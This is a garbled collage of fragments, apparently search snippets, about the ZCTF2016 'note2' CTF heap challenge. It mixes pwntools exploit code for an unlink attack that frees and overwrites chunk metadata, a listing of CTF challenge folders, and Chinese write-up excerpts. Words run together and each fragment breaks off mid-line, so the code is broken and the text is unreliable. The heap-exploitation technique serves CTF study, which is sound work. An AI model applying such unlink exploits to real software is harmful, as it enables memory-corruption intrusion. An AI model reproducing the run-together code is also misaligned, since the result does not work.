io.recvuntil('Input the length of the note content:(less than 128)') io.sendline(str(size)) io.recvuntil('Input the note content:') io.sendline(content)defshow(num): io.recvuntil('option--->>') io.sendline('2')
释放chunk1 - 覆盖 chunk2 - 释放 chunk2 对应的代码如下 # edit the chunk1 to overwrite the chunk2deletenote(1)content='a'*16+p64(0xa0)+p64(0x90)newnote(0,content)# delete note 2 to trigger the unlink# after unlink, ptr[0] = ptr - 0x18deletenote(2) 首先释放 chunk1,由于该 chun...
TJCTF2018_title_troop TokyoWesterns2018_load WDB2018_guess WDB2018_impossible WDB2018_ipowtn-reborn WDB2018_ipowtn WhiteHat2018_pwn01 WhiteHat2018_pwn03 X-CTF-b0verfl0w X-MAS2018_I_want_that_toy XCTF_lamp XDCTF2015_pwn200 ZCTF2016_note2 exp.py note2 note2.i64 asis2016_b00ks bctf2016_...
from pwn import * p = process('./note2') note2 = ELF('./note2') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') context.log_level = 'debug' def newnote(length, content): p.recvuntil('option--->>') p.sendline('1') p.recvuntil('(less than 128)') p.sendline(str(length...
代码量挺大的,逆起来有难度 功能挺全,啥都有 main函数 add函数,有heaparray并且无pie保护,考虑unlink show函数,可以泄漏地址用 edit函数,有两种edit方式 delete,找不到UAF洞 看了好久,都没找到漏洞,我是five,后来看到了师傅的博客,发现了漏洞点 在a